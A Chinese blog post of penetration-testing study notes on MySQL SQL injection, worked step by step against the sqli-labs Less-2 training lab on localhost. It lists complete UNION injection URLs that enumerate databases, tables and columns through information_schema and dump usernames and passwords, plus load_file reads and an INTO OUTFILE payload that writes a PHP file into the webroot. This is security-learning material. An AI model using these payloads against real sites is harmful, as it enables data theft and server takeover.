小迪渗透测试学习笔记(十三)WEB漏洞-SQL注入之MYSQL注入

最新推荐文章于 2022-09-19 13:33:28 发布
最新推荐文章于 2022-09-19 13:33:28 发布
阅读量417 收藏 1
点赞数
分类专栏: 安全 渗透 文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42591058/article/details/122088048
版权

MYSQL注入中首先要明确当前注入点权限,高权限注入时有更多的攻击手法,有的能直接进行getshell操作。其中也会遇到很多阻碍,相关防御方案也要明确,所谓知己知彼,百战不殆。不论作为攻击还是防御都需要了解其中的手法和原理,这样才是一个合格的安全工作者。

在这里插入图片描述

information_schema

在MySQL中,可以把 information_schema
看作一个信息数据库,其中存储关于MySQL服务器所维护的所有其他数据库的信息。如:数据库名,数据库的表,表的数据类型、访问权限以及有那些列等。其中有数个只读表,它们实际上是视图,而不是基本表,因此无法看到与之相关的任何文件。

SCHEMATA表: 提供了当前mysql实例中所有数据库的信息。参考 show databases

TABLES表: 数据库中的表的信息(包括视图)。详细描述了某个表的信息,参考 show tables from schemaname

COLUMNS表: 表中的列信息。详细描述了某张表的所有列以及每个列的信息。参考show columns from schemaname.tablename

SQL注入中使用information_schema 的流程一般是:

  1. 找出本数据库的名字;
  2. 已知数据库的名字通过information_schema查该数据库里存在哪些表;
  3. 通过该表查找需要的信息。

案例

sqlilabs第2关

获取数据库信息

  1. 获取所有数据库名
http://127.0.0.1/sqlilabs/Less-2/?id=-1%20union%20select%201,2,group_concat(schema_name)%20from%20information_schema.schemata

在这里插入图片描述

  1. 获取本数据库名
http://127.0.0.1/sqlilabs/Less-2/?id=-1%20union%20select%201,2,database()

在这里插入图片描述
3. 获取本数据库下所有表名

http://127.0.0.1/sqlilabs/Less-2/?id=-1%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27

在这里插入图片描述
4. 获取users中所有列名

http://127.0.0.1/sqlilabs/Less-2/?id=-1%20union%20select%201,2,group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27

在这里插入图片描述
5. 获取users表所有信息

http://127.0.0.1/sqlilabs/Less-2/?id=-1%20union%20select%201,group_concat(username),group_concat(password)%20from%20security.users

在这里插入图片描述
6. 获取其他数据库的信息,在第一步中看到存在一个bbs数据库,尝试获取其中信息。(这里要注意本数据库用户权限,只能高权限查看低权限)
在这里插入图片描述
7. 获取bbs的所有表

http://127.0.0.1/sqlilabs/Less-2/?id=-1%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27bbs%27

在这里插入图片描述
8. 获取pu_users表所有列名

http://127.0.0.1/sqlilabs/Less-2/?id=-1%20union%20select%201,2,group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=%27bbs%27%20and%20table_name=%27pu_users%27

在这里插入图片描述
9. 获取bbs的pu_users的所有信息

http://127.0.0.1/sqlilabs/Less-2/?id=-1%20union%20select%201,group_concat(user),group_concat(password)%20from%20bbs.pu_users

在这里插入图片描述

文件读取

  1. 查看是否有写入权限
show global variables like '%secure_file_priv%';

在这里插入图片描述
NULL: 不允许导入或导出
/tmp: 只允许在 /tmp 目录导入导出
空: 不限制目录

  1. 新建一个aaa.txt文件,尝试读取aaa.txt文件内容

mysql终端测试:

select load_file('C:/xry/tools/phpstudy/PHPTutorial/WWW/sqlilabs/Less-2/aaa.txt');

在这里插入图片描述

网站测试:

http://127.0.0.1/sqlilabs/Less-2/?id=-1%20union%20select%201,2,load_file(%27C:/xry/tools/phpstudy/PHPTutorial/WWW/sqlilabs/Less-2/aaa.txt%27)

在这里插入图片描述
读取成功。

文件写入

  1. 在数据库终端,将 <?php phpinfo() ?> 写入aaa.php,并尝试读取。
select '<?php phpinfo() ?>' into outfile 'C:/xry/tools/phpstudy/PHPTutorial/WWW/sqlilabs/Less-2/aaa.php';

select load_file('C:/xry/tools/phpstudy/PHPTutorial/WWW/sqlilabs/Less-2/aaa.php');

在这里插入图片描述

  1. 网站测试,先将上面创建的文件删除,重新尝试写入
http://127.0.0.1/sqlilabs/Less-2/?id=-1%20union%20select%201,2,%27%3C?php%20phpinfo()%20?%3E%27%20into%20outfile%20%27C:/xry/tools/phpstudy/PHPTutorial/WWW/sqlilabs/Less-2/aaa.php%27;%20--+

在这里插入图片描述
读取:

http://127.0.0.1/sqlilabs/Less-2/?id=-1%20union%20select%201,2,load_file(%27C:/xry/tools/phpstudy/PHPTutorial/WWW/sqlilabs/Less-2/aaa.php%27)

在这里插入图片描述

magic_quotes_gpc(魔术引号开关)

在magic_quotes_gpc = On的情况下,如果输入的数据有单引号(’)、双引号(")、反斜线(\)与 NULL(NULL字符)等字符都会被加上反斜线,作用和 addslashes() 的作用是相同的。

萧丶RY
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入漏洞详解
墨痕诉清风的博客
08-09 9347
" 预先编译好,也就是SQL引擎会预先进行语法分析,产生语法树,生成执行计划,也就是说,后面你输入的参数,无论你输入的是什么,都不会影响该SQL语句的语法结构了,因为语法分析已经完成了,而语法分析主要是分析SQL命令,比如 select、from 、where 、and、 or 、order by 等等。在这里,我们使用了占位符的方式,将该SQL传入prepare函数后,预处理函数就会得到本次查询语句的SQL模板类,并将这个模板类返回,模板可以防止传那些危险变量改变本身查询语句的语义。
小迪网络安全笔记》 第十二节:WEB漏洞-SQL注入之简要SQL注入
小陈的博客
08-20 4660
前言 在本系列课程学习中,SQL注入漏洞将是重点部分,其中SQL注入又非常复杂,区分各种数据库类型,提交方法,数据类型等注入,我们需要按部就班的学习,才能学会相关SQL注入的核心。同样此类漏洞WEB安全中严重的安全漏洞学习如何利用,挖掘,修复也是很重要的。 注:左边的比右边的难,学习顺序为从右向左。 一、忍者安全测试系统使用说明 二、上述思维导图简要说明 操作系统:windows和linux对大小写敏感不同,如果查了操作系统可以避免这个问题。 数据库名:如果不知道数据库名查询的时候会有问题。
【CTF bugku 成绩查询】关于sql注入
zw05011的博客
01-17 631
知识点 sql注入基础原理(超详细) - 简书一、Sql注入简介 Sql 注入攻击是通过将恶意的 Sql 查询或添加语句插入到应用的输入参数中,再在后台 Sql 服务器上解析执行进行的攻击,它目前黑客对数据库进行攻击的最...https://www.jianshu.com/p/078df7a35671通过1和1'查看返回值,确定注入 通过1' order by 1#、1' order by 2#直到确定为几列 通过联合查询 1' union select database(),user()#进行查询
sql server 字段密码解密_SQL注入漏洞测试
weixin_39927059的博客
12-07 959
SQL注入漏洞测试 --Write Up题目用到的工具AES加密网站:http://tool.chacuo.net/cryptaesBASE64加密网站:https://www.sojson.com/base64.htmlMD5加密网站:https://www.cmd5.com/1.靶场https://www.mozhe.cn/bug/deta...
mysql注入万能密码_Natas14 Writeup(sql注入sql万能密码)
weixin_39861255的博客
02-07 214
Natas14:是一个登录页面。源码如下。if(array_key_exists("username", $_REQUEST)) {$link = mysql_connect('localhost', 'natas14', '');mysql_select_db('natas14', $link);$query = "SELECT * from users where username=\"".$...
小迪基础渗透笔记0-24天
05-18
小迪基础渗透笔记0-24天
渗透测试学习笔记之案例三.pdf
04-06
渗透测试学习笔记
sql注入-注入漏洞获得数据库数据-kali-sqlmap-运维安全详细笔记
06-30
SQL 注入是一种常见的 Web 应用安全漏洞,攻击者通过构造特殊的 SQL 语句来访问、修改或控制数据库中的数据。下面我们将详细介绍 SQL 注入的攻击方式、防御方法和相关工具。 一、SQL 注入攻击方式 1. 手动注入:...
渗透测试学习笔记之案例一.pdf
04-06
渗透测试学习笔记
【基础篇】第01篇:PHP代码审计笔记--SQL注入1
08-03
【PHP代码审计笔记——SQL注入1】主要探讨的是在PHP环境中如何防止SQL注入攻击,特别是针对MySQL数据库。SQL注入是一种常见的网络安全威胁,攻击者通过构造恶意的SQL语句,利用程序漏洞来执行非授权的操作,如获取...
sql注入攻击实例_【SEA分享】Web渗透——SQL注入攻击原理及实例
weixin_39664995的博客
12-09 2978
相信点进来的你和我一样看不懂标题。没关系,不妨先了解一下,为什么我在网址栏里输入一串网址,就可以访问到这个网页。了解通信原理之后能帮助你更好的理解后面实例中的一顿“操作”。web通信原理介绍IP:ip 实际上就是生活中的地址,好像 XX省XX市XX区...... ,只不过 ip 是由数字组成。IP 分为内网ip 和 公网ip,公网地址是运营商分配,内网地址是路由器分配的。域名:方便记...
CTFHUB——SQL 报错注入三种方法全解
wuuconix's blog
08-25 2871
背景 Sql注入主要有三种方法,extractvalue和updatexml函数形成的xpath报错,这算两种。还有一种就是floor实现的group by主键重复,这算另外一种。 本篇文章将对CTFHUB中的SQL报错注入题目从头到尾对这三种方法进行实践。 利用extractvalue来xpath报错。 1 and (select extractvalue(1, concat(0x7e, (select database())))) 1 and (select extractvalue(1, conc
SQL注入漏洞测试实战
weixin_47493074的博客
09-19 569
sqlmap小测试
SQL注入】CTF练习题WriteUp——“百度杯”CTF比赛 九月场SQL
Fighting_hawk的博客
05-17 3473
1. 本题关键在于关键字的绕过,需要耐心+细心,一个个尝试。 2. 同时在练习过程中多记录累积一些绕过的方法,比如这一道题的。
[网络安全提高篇] 一〇五.SQL注入之揭秘Oracle数据库注入漏洞和致命问题(联合Cream老师)
杨秀璋的专栏
03-24 6578
前文带领大家搭建一个Oracle+phpStudy本地网络渗透靶场,并应用SQL注入、XSS攻击、文件上传漏洞三个场景。这篇文章将跟着Cream老师兼好友学习,结合自己的经验详细介绍Oracle数据库注入漏洞和致命问题,包括各种类型的注入知识。注入漏洞是安全威胁中比较常见的漏洞,Oracle也是用得最广的数据库,希望这篇文章对您有帮助。真心觉得Cream老师讲解非常厉害,且看且珍惜。
SQL注入原理深度解析
等着你的出现
02-18 263
对于Web应用来说,注射式攻击由来已久,攻击方式也五花八门,常见的攻击方式有SQL注射、命令注射以及新近才出现的XPath注射等等。本文将以SQL注射为例,在源码级对其攻击原理进行深入的讲解。 一、注射式攻击的原理注射式攻击的根源在于,程序命令和用户数据(即用户输入)之间没有做到泾渭分明。这使得攻击者有机会将程序命令当作用户输入的数据提交给Web程序,以发号施令,为所欲为。为了发动注射攻击,攻击者...
Web for pentester_writeup之SQL injections篇
ditanji3425的博客
08-07 404
Web for pentester_writeup之SQL injections篇 SQL injections(SQL注入) Example 1 测试参数,添加 and '1'='1, 'and '1'='2判断存在注入 猜解查询列数(%23为#号的URL编码,注释原有结构的单引号 http://192.168.219.136/sqli/example1.php?name=roo...
CTFHub技能树.Web.SQL注入 WriteUp与SQL注入学习笔记
qq_45716477的博客
04-19 394
目录Level 1整数型注入字符型注入报错注入布尔盲注时间盲注欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 Level 1 整数型注入 输入1 and 1=1 和1 and 1=2 输
实验吧-简单的sql注入3 Writeup
baynk的博客
07-29 340
继续继续 过程 输入1,然后发现只有一个hello。。。好吧,肯定得盲注了,先试试闭合吧,果然还是单引号的,但是居然有报错信息,应该也可以使用报错注入吧。 然后再尝试干掉单引号的时候意外发现#居然可以用了,这真是省了不少事。。 想来想去还是使用报错注入,盲注还是交给sqlmap来解决吧。先来搞库名,用的floor(),结果来这么一出。 don't到底是个啥,又换了两种其他的报错,updatexm...
sqli-labs靶场练习笔记
最新发布
11-09
"sqli-labs靶场练习笔记涵盖了从2关到24关的SQL注入学习内容,适合初学者参考,涉及单引号、双引号注入,布尔盲注,数据库名、表名、列名的探测,以及利用注入进行文件写入和信息获取等技能。" 在SQL注入学习过程...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值